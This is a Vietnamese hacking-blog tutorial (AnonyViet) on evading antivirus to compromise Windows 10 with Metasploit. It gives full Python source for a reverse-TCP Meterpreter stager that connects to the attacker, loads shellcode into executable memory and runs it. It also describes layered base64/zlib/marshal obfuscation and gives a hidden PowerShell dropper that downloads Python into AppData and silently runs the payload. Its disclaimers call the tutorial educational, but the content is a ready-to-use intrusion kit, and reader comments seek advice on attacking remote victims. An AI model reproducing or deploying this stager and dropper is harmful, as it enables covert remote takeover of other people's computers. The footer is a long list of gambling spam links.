• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Mình đã Bypass AV xâm nhập Windows 10 với Metasploit và Python như thế nào ?

Hevin by Hevin
09/06/2023 - Updated on 24/07/2025
in Basic Hacking
A A
6

Mục lục bài viết

  1. Khái niệm sơ qua về Metasploit
  2. Meterpreter Reverse TCP trong Metasploit là gì ?
  3. Tạo payload Meterpreter Reverse TCP trong Metasploit với Python
  4. Tấn công Windows 10 với Metasploit và Python
  5. Câu hỏi thường gặp
    1. Payload windows/meterpreter/reverse_tcp là gì và tại sao lại sử dụng nó?
    2. Việc sử dụng Metasploit và Python trong bài viết có an toàn không?
    3. Có cách nào khác để kiểm tra tính bảo mật hệ thống ngoài phương pháp này không?

An ninh mạng đóng vai trò quan trọng trong thế giới công nghệ ngày nay. Việc kiểm tra và nâng cao độ bảo mật hệ thống là trách nhiệm của người quản trị hệ thống và chuyên gia an ninh. Tuy nhiên, việc vượt qua phần mềm chống virus ( Bypass AntiVirus ) đã trở thành một phần không thể thiếu trong quá trình kiểm tra và đánh giá an ninh. Trong bài viết này, mình sẽ chia sẻ với bạn về kinh nghiệm thành công của mình trong việc Bypass AV và xâm nhập vào một máy tính chạy hệ điều hành Windows 10 bằng cách sử dụng Metasploit và Python. Đây là một quá trình thử thách và mang lại sự hiểu biết sâu hơn về phần mềm chống vi-rút và phát hiện các lỗ hổng trong hệ thống. Sau vài ngày mình tìm tòi về payload windows/meterpreter/reverse_tcp của Metasploit. mình đã viết ra 1 đoạn Script Python nhỏ cho payload này và cuối cùng thực hiện việc xâm nhập vào máy tính mục tiêu với đoạn script đó. Hãy cùng mình khám phá và tìm hiểu quá trình bypass AV và xâm nhập vào Windows 10 bằng cách sử dụng Metasploit và Python trong bài viết này nhé !

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Lưu ý: Bài viết không khuyến khích việc sử dụng kỹ thuật này cho bất kỳ hoạt động bất hợp pháp hoặc gây hại cho người khác. Anonyviet hy vọng rằng thông qua việc chia sẻ kiến thức này, bạn có thể nâng cao hiểu biết về an ninh mạng và áp dụng các biện pháp bảo vệ để bảo vệ hệ thống của mình. Mọi hành vi bất hợp pháp Anonyviet sẽ không chịu mọi trách nhiệm !

Các bài viết liên quan

Cách hacker sử dụng kĩ thuật Splitfus để thực thi mã độc Powershell

20/07/2025 - Updated on 25/07/2025
Cách Hacker Bypass AV xâm nhập Windows với Autoit

Cách Hacker Bypass AV xâm nhập Windows với Autoit

09/01/2024 - Updated on 24/07/2025

6 cách bảo vệ máy tính khỏi virus khi bạn không có phần mềm diệt Virus

25/08/2023 - Updated on 24/07/2025
Hide Malware In Image

Hacker ẩn Malware vào hình ảnh và thực thi như thế nào ?

05/08/2023 - Updated on 24/07/2025

Khái niệm sơ qua về Metasploit

Metasploit là một framework mã nguồn mở rất phổ biến trong lĩnh vực kiểm thử xâm nhập và khai thác lỗ hổng. Nó được sử dụng để tạo ra một môi trường điều kiện nhân tạo để phân tích các lỗ hổng bảo mật, giúp các chuyên gia bảo mật tìm ra các điểm yếu trong hệ thống mạng và ứng dụng của họ. Metasploit cung cấp rất nhiều công cụ và tài nguyên để tấn công và khai thác các lỗ hổng trong hệ thống, giúp chuyên gia bảo mật kiểm tra và tăng cường tính bảo mật của mạng và ứng dụng. Metasploit được phát triển bởi Rapid7 và sử dụng ngôn ngữ lập trình Ruby, với giao diện dòng lệnh và đồ họa để người dùng dễ dàng sử dụng. Nó cho phép người dùng tự động hóa quá trình kiểm thử và tìm ra các lỗ hổng, tăng cường hiệu suất và tiết kiệm thời gian. Metasploit cung cấp nhiều tính năng như scan port, tìm kiếm lỗ hổng, khai thác, tràn bộ đệm, thu thập thông tin, tạo mã độc,…. Nó cũng cung cấp một cơ sở dữ liệu lỗ hổng rộng lớn, cho phép người dùng tìm kiếm và khai thác các lỗ hổng đã được biết đến. Không những thế nó còn là một công cụ được sử dụng để kiểm tra và củng cố tính bảo mật của hệ thống từ đó cung cấp một môi trường an toàn hơn cho các hệ thống mạng và ứng dụng

Meterpreter Reverse TCP trong Metasploit là gì ?

Meterpreter Reverse TCP là một loại kết nối ngược (reverse connection) được sử dụng trong Metasploit Framework để tạo một secure channel ( kênh truyền thông an toàn ) giữa máy tấn công và máy mục tiêu.

Khi sử dụng Meterpreter Reverse TCP, máy hacker đóng vai trò là máy chủ lắng nghe (listener), trong khi máy nạn nhân là máy khách (client). Quá trình hoạt động diễn ra như sau:

  1. Máy hacker khởi động một cổng TCP cụ thể ( listener )
  2. Máy nạn nhân lây nhiễm bởi một payload (chương trình độc hại) thông qua một phương thức tấn công, ví dụ như download phần mềm độc hại,  hoặc xâm nhập qua email,…
  3. Payload được thiết lập trên máy mục tiêu và kết nối ngược (reverse connection) được thiết lập từ máy nạn nhân đến máy hacker thông qua giao thức TCP.
  4. Khi kết nối được thiết lập, Meterpreter là một công cụ quản lý tấn công mạnh mẽ trong Metasploit, được chạy trên máy nạn nhân và giao tiếp với máy hacker thông qua secure channel đã thiết lập
Xem thêm:  Writeup về phòng Dumping Router Firmware trên Tryhackme

Meterpreter Reverse TCP cung cấp nhiều tính năng mạnh mẽ cho hacker, bao gồm khả năng kiểm soát từ xa máy nạn nhân, thực thi các lệnh trên hệ thống của nạn nhân, truy cập vào các tệp và thư mục, thu thập thông tin quan trọng và thậm chí thâm nhập sâu vào hệ thống

Tạo payload Meterpreter Reverse TCP trong Metasploit với Python

Chi tiết cấu trúc payload:

  • Kết nối đến máy hacker thông qua socket TCP/IP.
  • Nhận dữ liệu từ kết nối và giải nén các thông tin cần thiết.
  • Sử dụng thư viện ctypes trong Python để cấp phát bộ nhớ và sao chép mã máy thấp vào bộ nhớ.
  • Tạo một luồng riêng biệt để thực thi mã máy thấp trong bộ nhớ.
  • Dừng chương trình chính để duy trì quyền điều khiển từ xa

Đoạn code Python này bắt đầu bằng việc import các thư viện cần thiết để làm việc với socket, struct, time, threading và ctypes

import socket
import struct
import time
import threading
import ctypes

 

Biến ip định nghĩa địa chỉ IP mà máy tính đang chạy chương trình sẽ kết nối đến. Biến port chỉ định số cổng để kết nối tới hacker

ip = "<ip>" # địa chỉ ip hacker
port = <port> # số cổng hacker đã mở bên Metasploit

 

Khởi tạo biến connected để theo dõi trạng thái kết nối và sử dụng vòng lặp while để thử kết nối với máy hacker cho đến khi thành công. Trong vòng lặp while này, một socket được tạo và cố gắng kết nối đến địa chỉ IP và cổng của hacker. Nếu kết nối thành công, biến connected được đặt thành True và vòng lặp dừng lại. Nếu xảy ra lỗi TimeoutError, payload sẽ chờ 0.1 giây rồi kết nối lại

connected = False

while not connected:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        connected = True
    except TimeoutError:
        time.sleep(0.1)

 

Nhận dữ liệu đầu tiên từ socket. Dòng code bên dưới sử dụng phương thức recv() của socket để nhận 4 byte dữ liệu đầu tiên từ kết nối

data = s.recv(4)

 

Giải nén độ dài dữ liệu từ dữ liệu nhận được. Dòng code bên dưới sử dụng hàm unpack() từ module struct để giải nén 4 byte đầu tiên của dữ liệu thành một số nguyên không dấu 32 bit (unsigned integer) được đóng gói theo định dạng little-endian. Sau đó, giá trị này được cộng với 5 và gán cho biến data_len. Việc cộng 5 đến data_len là do dữ liệu sau khi giải nén bao gồm cả 4 byte đầu tiên nhưng cần phải chứa thêm 5 byte

data_len = struct.unpack("<I", data)[0] + 5

 

Tiếp tục nhận dữ liệu từ socket cho đến khi đủ độ dài đã giải nén. Vòng lặp này sử dụng phương thức recv() để nhận dữ liệu từ socket cho đến khi tổng chiều dài của dữ liệu đã nhận được bằng với data_len

while len(data) < data_len:
    data += s.recv(data_len - len(data))

 

Đóng gói handle của socket và dữ liệu đã nhận vào một bytearray mới. Với dòng code này sử dụng hàm pack() từ module struct để đóng gói số hiệu file (file descriptor) của socket (s.fileno()) thành một bytearray handle. Sau đó, các bytearray khác được tạo ra bằng cách ghép nối bytearray [0xBF]một bytearray chứa một phần tử duy nhất là giá trị 0xBF (191 trong hệ thập phân), bytearray(handle) chuyển đổi biến handle từ kiểu dữ liệu được đóng gói thành một bytearray mới.data[4:] truy cập vào phần dữ liệu đã nhận từ socket, bắt đầu từ byte thứ 4 (bỏ qua 4 byte đầu tiên). Toàn bộ các bytearray được ghép nối với nhau bằng phép cộng (+) để tạo ra bytearray data mới

handle = struct.pack("<I", s.fileno())
data = bytearray([0xBF]) + bytearray(handle) + data[4:]

 

Hai hằng số MEM_COMMIT và PAGE_EXECUTE_READWRITE được định nghĩa để sử dụng trong việc cấp phát bộ nhớ và thiết lập quyền truy cập bộ nhớ. MEM_COMMIT là một hằng số được đặt giá trị là 0x1000, biểu thị chế độ cấp phát bộ nhớ trong hàm VirtualAlloc().Giá trị 0x1000 tương ứng với cấp phát vùng nhớ mới và cấu hình quyền truy cập vào vùng nhớ đó. PAGE_EXECUTE_READWRITE là một hằng số có giá trị là 0x40, biểu thị quyền truy cập vào vùng nhớ trong hàm VirtualAlloc(). Giá trị 0x40 đại diện cho quyền truy cập đọc, ghi và thực thi (execute) cho vùng nhớ đó. Bằng cách sử dụng PAGE_EXECUTE_READWRITE, mình cho phép vùng nhớ được cấp phát có thể chứa mã thực thi và có thể đọc và ghi dữ liệu

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

 

Xem thêm:  Hướng dẫn Hack Kahoot đơn giản và dễ dàng

Sử dụng thư viện kernel32 từ ctypes để cấp phát và sao chép dữ liệu vào bộ nhớ. Dòng code bên dưới sử dụng hàm VirtualAlloc() của thư viện kernel32 để cấp phát một khối bộ nhớ có kích thước là len(data). Khối bộ nhớ này sẽ được cấp phát với quyền truy cập PAGE_EXECUTE_READWRITE. Sau đó, dữ liệu từ data được sao chép vào địa chỉ bộ nhớ được cấp phát bằng cách sử dụng ctypes.memmove(). Các dòng code mà mình đã đề cập có liên quan đến việc sử dụng Windows API thông qua ctypes để cấp phát và sao chép dữ liệu vào vùng nhớ được cấp phát. Cụ thể như sau:

  1. kernel32 = ctypes.windll.kernel32:
    • Dòng này tạo một đối tượng kernel32 để truy cập các hàm của Windows API trong thư viện kernel32.dll.
    • ctypes.windll là một cách để truy cập các thư viện được cung cấp bởi hệ điều hành Windows.
  2. address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE):
    • kernel32.VirtualAlloc() là một hàm trong Windows API để cấp phát vùng nhớ ảo.
    • Dòng mã trên gọi hàm VirtualAlloc() để cấp phát một vùng nhớ ảo mới.
    • None đại diện cho địa chỉ cơ sở (base address) của vùng nhớ ảo (do không xác định trước).
    • len(data) xác định kích thước (số byte) của vùng nhớ cần cấp phát, dựa trên kích thước của data.
    • MEM_COMMIT là hằng số đã được định nghĩa trước, biểu thị chế độ cấp phát bộ nhớ.
    • PAGE_EXECUTE_READWRITE cũng là hằng số đã được định nghĩa trước, biểu thị quyền truy cập vào vùng nhớ.
  3. data_array = (ctypes.c_char * len(data)).from_buffer(data):
    • Dòng mã này tạo một mảng data_array với kiểu dữ liệu ctypes.c_char và kích thước là len(data).
    • ctypes.c_char đại diện cho một ký tự (byte) trong ctypes.
    • .from_buffer(data) tạo một view (chế độ xem) của mảng data đã được nhận trước đó, nghĩa là mảng data_array sẽ trỏ đến vùng nhớ của data để sử dụng chung dữ liệu.
  4. ctypes.memmove(address, ctypes.pointer(data_array), len(data)):
    • ctypes.memmove() là một hàm trong ctypes để sao chép dữ liệu từ một vùng nhớ đến một vùng nhớ khác.
    • Dòng mã trên sao chép nội dung của data_array vào vùng nhớ được cấp phát address.
    • address là địa chỉ cần sao chép dữ liệu đến.
    • ctypes.pointer(data_array) trả về con trỏ đến vùng nhớ của data_array.
    • len(data) xác định số byte cần sao chép

Nói chung là đoạn code bên dưới sử dụng Windows API thông qua ctypes để cấp phát một vùng nhớ ảo mới, tạo một mảng dữ liệu data_array trỏ đến dữ liệu đã nhận từ socket, và sau đó sao chép dữ liệu từ data_array vào vùng nhớ đã được cấp phát. Quá trình này chuẩn bị cho việc thực thi mã thực thi từ vùng nhớ ảo đó

kernel32 = ctypes.windll.kernel32
address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
data_array = (ctypes.c_char * len(data)).from_buffer(data)
ctypes.memmove(address, ctypes.pointer(data_array), len(data))

 

Với dòng code bên dưới, mình đã tạo một luồng mới bằng cách sử dụng module threading.Thread(). Luồng này sẽ thực thi mã máy thấp tại địa chỉ bộ nhớ được cấp phát. Địa chỉ bộ nhớ này được truyền vào target dưới dạng con trỏ hàm ctypes.CFUNCTYPE(None). Không có đối số được truyền vào luồng (args=())

thread = threading.Thread(target=ctypes.cast(address, ctypes.CFUNCTYPE(None)), args=())
thread.start()

 

Dòng code cuối cùng dùng để cho payload chạy trong 9999999 giây tức là khoảng 115 ngày, bạn có thể tăng thêm hoặc giảm thời gian tùy ý nhé

time.sleep(9999999)

 

Đây là toàn bộ mã nguồn mà mình đã tạo:

import socket
import struct
import time
import threading
import ctypes

ip = "<ip>" # địa chỉ ip hacker 
port = <port> # số cổng hacker đã mở bên Metasploit
connected = False

while not connected:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        connected = True
    except TimeoutError:
        time.sleep(0.1)

data = s.recv(4)

data_len = struct.unpack("<I", data)[0] + 5
while len(data) < data_len:
    data += s.recv(data_len - len(data))

handle = struct.pack("<I", s.fileno())

data = bytearray([0xBF]) + bytearray(handle) + data[4:]

MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40

kernel32 = ctypes.windll.kernel32
address = kernel32.VirtualAlloc(None, len(data), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
data_array = (ctypes.c_char * len(data)).from_buffer(data)
ctypes.memmove(address, ctypes.pointer(data_array), len(data))


thread = threading.Thread(target=ctypes.cast(address, ctypes.CFUNCTYPE(None)), args=())
thread.start()

time.sleep(9999999)

Bây giờ chúng ta sẽ đến phần tấn công Windows 10 với Metasploit và Python nhé

Xem thêm:  Tìm hiểu SMS/CALL/MAIL - SPOOFING và BOMBING là gì

Tấn công Windows 10 với Metasploit và Python

Bây giờ, máy hacker có địa chỉ ip 192.168.1.3 và port tcp 9999, tiếp đến địa chỉ ip máy nạn nhân là 192.168.1.5, mình sẽ tiến hành setup trên Metasploit như sau:

Bypass AV hack WIndows 10 với Metasploit và Python

 

Được rồi, giờ mình mã hóa script python với module marshal, zlib, lzma và base64 để tránh các phần mềm AntiVirus quét được, đoạn script python đã mã hóa có dạng như sau:

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Sau khi mã hóa script python với module marshal, zlib, lzma và base64, mình lại mã hóa toàn bộ script với base64 tại website base64encode.org

Bấm vào “ENCODE” để bắt đầu mã hóa

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Bấm vào “Copy to clipboard” để copy mã base64 lại nhé

bypass AV xâm nhập Windows 10 với Metasploit và Python

Đây là đoạn lệnh Powershell mình đã viết sẵn, việc của bạn là chỉ cần paste toàn bộ script được mã hóa bằng base64. Bạn thay thế <your base64code payload>thành mã base64 của bạn

powershell.exe -WindowStyle Hidden -Command "$code_payload='<your base64code payload>'; $bat1='@echo off'; $bat2='pythonRun module.py'; $cd_appdata=$Env:AppData; Set-Location -Path $cd_appdata; $current_cwd=Get-Location; if (Test-Path -Path 'pythonRun') { Set-Location -Path \"$current_cwd\pythonRun\"; $payload=$code_payload; $decoded=[System.Convert]::FromBase64String($payload); $bat1=$bat1; $bat2=$bat2; $bat1 + \"`r`n\" + $bat2 | Out-File -FilePath svc.bat -Encoding ascii; Set-Content -Path 'module.py' -Value ([System.Text.Encoding]::ASCII.GetString($decoded)); Start-Process -FilePath svc.bat -WindowStyle Hidden } else { Invoke-WebRequest -Uri 'https://www.python.org/ftp/python/3.10.9/python-3.10.9-embed-win32.zip' -OutFile pythonRun.zip; Expand-Archive -Path pythonRun.zip -DestinationPath pythonRun; Start-Sleep -Seconds 1; Rename-Item -Path \"$current_cwd\pythonRun\python.exe\" -NewName pythonRun.exe; Remove-Item -Path pythonRun.zip; Set-Location -Path \"$current_cwd\pythonRun\"; $payload=$code_payload; $decoded=[System.Convert]::FromBase64String($payload); $bat1=$bat1; $bat2=$bat2; $bat1 + \"`r`n\" + $bat2 | Out-File -FilePath svc.bat -Encoding ascii; Set-Content -Path 'module.py' -Value ([System.Text.Encoding]::ASCII.GetString($decoded)); Start-Process -FilePath svc.bat -WindowStyle Hidden }"

 

Đây là đoạn lệnh của mình, chỉ cần thực thi đoạn lệnh Powershell là nó tự động tải Python vào máy nạn nhân và thực thi đoạn script Python độc hại đã được mã hóa bằng base64

bypass AV xâm nhập Windows 10 với Metasploit và Python

 

Và đây là kết quả

Như vậy, chưa đầy 50 dòng code Python cộng với 1 đoạn lệnh Powershell và công cụ Metasploit, mình đã có thể xâm nhập Windows 10 rồi. Mình muốn nhấn mạnh rằng việc tấn công máy tính của người khác là trái với đạo đức và pháp luật. Mình viết bài này chỉ để giúp người đọc hiểu thêm về cách thức hoạt động của các mã độc và cách phòng chống nó. Nếu bạn là một chuyên gia bảo mật, mình hy vọng rằng bài viết này sẽ giúp bạn nâng cao kiến thức và kỹ năng của mình trong việc sử dụng công cụ Metasploit để kiểm tra tính an toàn của hệ thống và bảo vệ chúng khỏi các cuộc tấn công từ phía tin tặc. Và nếu bạn là một người dùng bình thường, mình khuyên bạn luôn cập nhật các phần mềm bảo mật và hạn chế việc tải các phần mềm từ những nguồn không rõ nguồn gốc để bảo vệ tốt nhất cho hệ thống của mình.

Cuối cùng, mình muốn nhấn mạnh rằng việc sử dụng các công cụ Metasploit cũng như là các công cụ khác để xâm nhập vào hệ thống của người khác là trái với đạo đức và pháp luật. Chúng ta cần tôn trọng quyền riêng tư và bảo vệ an toàn thông tin của nhau nhé. Chúc bạn có một ngày tốt lành ! BYE BYE !!!!

 

Bạn cũng có thể đọc thêm bài viết Cách quét lỗ hổng bằng Metasploit 

Câu hỏi thường gặp

Payload windows/meterpreter/reverse_tcp là gì và tại sao lại sử dụng nó?

Payload windows/meterpreter/reverse_tcp là một loại payload Metasploit tạo ra một kết nối ngược từ máy tính mục tiêu về máy của người tấn công. Nó được sử dụng vì khả năng cung cấp một shell tương tác, cho phép người tấn công điều khiển máy tính mục tiêu từ xa.

Việc sử dụng Metasploit và Python trong bài viết có an toàn không?

Bài viết chỉ trình bày mục đích giáo dục về an ninh mạng. Việc sử dụng Metasploit và các kỹ thuật tương tự mà không được phép là bất hợp pháp. Chỉ sử dụng các kỹ thuật này trên hệ thống của bạn hoặc hệ thống mà bạn có quyền truy cập hợp pháp.

Có cách nào khác để kiểm tra tính bảo mật hệ thống ngoài phương pháp này không?

Có rất nhiều phương pháp khác để đánh giá an ninh mạng, bao gồm quét lỗ hổng, kiểm thử thâm nhập (penetration testing) chuyên nghiệp, phân tích mã độc và triển khai các hệ thống giám sát bảo mật.

Tags: avBypass avvirus
Hevin

Hevin

Related Posts

Basic Hacking

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

08/03/2025 - Updated on 25/07/2025
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025 - Updated on 25/07/2025
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024 - Updated on 24/07/2025
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024 - Updated on 24/07/2025
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024 - Updated on 24/07/2025
Subscribe
Notify of
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

6 Comments
oldest
newest
Inline Feedbacks
View all comments
huy hoang
huy hoang
2 years ago

Mình vẫn chưa hiểu nếu cách này thì chỉ dùng cho cùng mạng LAn đúng không chứ từ xa qua ip tĩnh và port thì máy nạn nhân nó đầu tấn công được

Reply
AnonyViet
Admin
AnonyViet
2 years ago
Reply to  huy hoang

tấn công từ xa thì bạn nat port

Reply
long
long
5 months ago
Reply to  AnonyViet

có cách nào không cần nat port không bác, forward port đc ko bác

Reply
AnonyViet
Admin
AnonyViet
5 months ago
Reply to  long

bạn xem các hướng dẫn ở đây https://anonyviet.com/?s=nat+port

Reply
Trung
Trung
1 year ago

cho mình hỏi nếu chx thêm your base64code payload vào máy thì chạy không sao đúng không? Mình lỡ chạy nhma chưa thêm cái your base64code payload của mình vào

Reply
hevin
hevin
9 months ago
Reply to  Trung

Đúng rồi bạn, chưa thêm base64 code máy chạy không sao đâu

Reply
wpdiscuz   wpDiscuz

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Stirling PDF: Giải pháp miễn phí thay thế Adobe Acrobat

by Thanh Kim
23/08/2025
0

Cách tự động xóa lịch sử web sau khi thoát để bảo mật tuyệt đối

by Thanh Kim
22/08/2025
0

Bảng báo giá mặt bích inox tại Asia Industry

by DeathGM
21/08/2025
0

Hướng dẫn nhận 80.000 điểm Viettel ++ nhân dịp 2/9

by Thanh Kim
21/08/2025
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • phuong trong Hướng dẫn nhận 80GB Data miễn phí từ Vinaphone từ 15/8
  • Quí trong Hướng dẫn nhận 80GB Data miễn phí từ Vinaphone từ 15/8
  • khoi trong Tut hướng dẫn Hack 4G mới nhất cho sinh viên
  • BaoChi trong Hack Mod Free Fire 1.109 OBB 48 Hack Map Headshot
  • Jiang trong Hướng dẫn nhận Perplexity Pro 1 năm miễn phí trị giá $200
  • dhin trong App check hàng giả: Lá chắn bảo vệ bạn khỏi ma trận hàng fake
  • Communist456 trong Nhận ngay key bản quyền iTop Easy Desktop v3 miễn phí 6 tháng
  • Hevin trong Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit
  • khoa trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Anh trong Genspark: Công cụ AI Agent giúp tải mọi thứ chỉ bằng một câu lệnh
  • AnonyViet trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • phuong trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Tòn Seven trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • AnonyViet trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Tuan trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • AnonyViet trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Thg Trn trong Cách tạo Google AI Pro 12 tháng miễn phí bằng tài khoản sinh viên Ấn Độ
  • Phuong trong Download Deep Freeze 8.6 Full Key – Phần mềm đóng băng ổ đĩa
  • datdeptrai trong Tạo Virus nguy hiểm Tắt Internet vĩnh viễn bằng Notepad
  • Kim trong Cách phát hiện mã QR độc hại để tránh bị lừa đảo

©2025 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ Danh mục kết quả xổ số hôm nay trực tiếp bóng đá xoilac colatv truc tiep bong da https://xx88.ac/ trang chủ hi88 trang chủ hi88 KUBET xoilac 8XBET Kubet https://new88.market/ bong88 https://cwfun.org/ https://hi88.gives/ 33win 789win ww88 kubet https://thabet-vn.com/ Ae888 kubet 789Club 188BET 188BET Link https://789club10.pro kubet 8kbet pg88 99ok xin88 good88 https://www.chantalsutherlandjockey.com/ https://www.go88vn.uk.com/ https://www.rikvip-viet.net/ kubet 32WIN RR88 cakhiatv Thapcam TV Game bài đổi thưởng https://33winlink.live/ f8bet https://qq883a.com/ https://789betviet.com/ rr88 XX88 Leo88 Leo88 nha cai uy tin mu88 casino Vebo TV https://v9betnet.com/ https://ee88vie.com/ max88 iwin 79king SV388 69VN Zomclub https://hi88fz.com/ https://u888.one/ https://go886.org/ https://sunwin10.org/ https://789club10.life/ Jun88 https://jun88pro.org/ 77Bet HB88 123b https://33winvn.me/ Tha bet hello88 188bet kubet11 k8cc f168 luckywin fm88 xin88 https://918xxy.com/ https://77betvn.me/ https://hb88vn.live/ kubet thailand vip66 xoso66 vip66 xoso66 luckywin https://tp88fun.com/ trang chủ hi88 daga f8bet hello88 qq88 Luckywin NH88 https://abc8.furniture/ leo88 hb88 77bet GK88 79king PG88 SV388 PG88 Xoso66 Vip66 hitclub HB88 HB88 https://j88ss.com/ https://hubett2.org/ bong99 Ga6789 DAGA XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 98win s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ https://max886.org/ sunwin 32win NH88 33win com https://ok9393.com/ PG88 alo789s sv368pro qq88 https://23win.codes/ 68win https://xx88.space/ https://qq88.studio/ xoilac cakhiatv socolive QQ88 TP88 8kbet hi 88 King88 king88 88i 79king Xoso66 https://luongsontv73.com/ 32win xoso66 u888 rr88 79king pg88 s666 fb88 f168 88vv EV88 https://xx88.tech/ https://mm88.today/ mu88 com 8kbet 23win Xin88 Nohu90 https://qq88pro.vip/ https://vzqq888.com/ https://king88kr.pro/ https://mb66.bz https://789win1.live/ SUNCITY xoso66 13 WIN motphimtv 33win https://98wincom.city/ 32win 789Bet fun88.supply king88 33win NH88 https://fun88.supply/ https://pg88p.top/ hello88 w88 8xbet sv388 betvisa bong88 fun88 78win 8day 8day v9bet s666 go88 luongsontv KUWIN 3389 SH BET u888lm.com https://max88rl.com/ https://ok365rl.com/ HI888 RR88 kubet 99ok FB88 77BET TYPHU88 https://xx88.ink/ https://vb88.social/ game bài đổi thưởng 789BET RR88 https://da88.design/ luongsontv 789f Kkwin go88 S666 sv368 79king https://urr88.com/ sv388 58win xin88 XO88 https://v9bet.market/ https://88clb332.com/ https://debettt.co/ https://8day.ad/ https://vn88.doctor/ VSBET 23WIN TA88 https://88aa.rest/ nohu90 https://fun88.supply/ https://qq88gg.net/ 69vn pg88 nổ hũ đổi thưởng colatv truc tiep bong da https://888clbs.com/ https://abc8255.com thapcamtv thapcamtv RR88 99OK https://drr88.com/ 8x bet bk8 bk8 iwin club rik vip https://78win.id/ da88 8day gk88 - m88 https://rr88.navy/ MM99 Luckywin fb88 TD88 https://98wintt.com/ uw88 NEW88 OKKING King88 https://e2beting.com/ 88clb gem88 f8bet https://pg88betting.com/ bk8 bk8 daga 888b NOHU90 Luck8 32 win SHBET u888 zowin TD88 https://23win.kim/ FB88 F8BET80 kubet https://789p.monster/ F168 soc88 typhu88 k8cc k8cc 12bet sa88 cado888 https://q23win.com/ https://23win.men/ bet88 F168 CWIN F168 32win 32win Vinbet Nohu BL 555 BL555 98WIN RR88 xin88 https://kubet.legal/ https://keonhacai888.win/ https://vn88-vn.com/ https://i9bet-vn.net/ https://typhu88-vn.com/ https://hb88-vn.org/ 78win kubet 789f https://789wintop.vip/ 68win RR88 KING88 Bet88 BET88 https://6ff.blue 68win Hay88 ww88 f8bet 79KING PG88 23win luongsontv luongsontv https://vankhanhtv.cc/ 9bet pg99 https://rr88.us.org/ 13win 23win NOHU90 https://hubetad.com/ https://buk88.com/ 789win fund https://king88.international/ https://ax88e.com https://bett88.co/ rikvip gem88 cakhia tv j88 ventures New88 XX88 abc8 abc8 https://king8888.pro/ xx88.me.uk https://28bets.net/ https://tx88t.com/ BCX88 https://23win.men/ 23win com 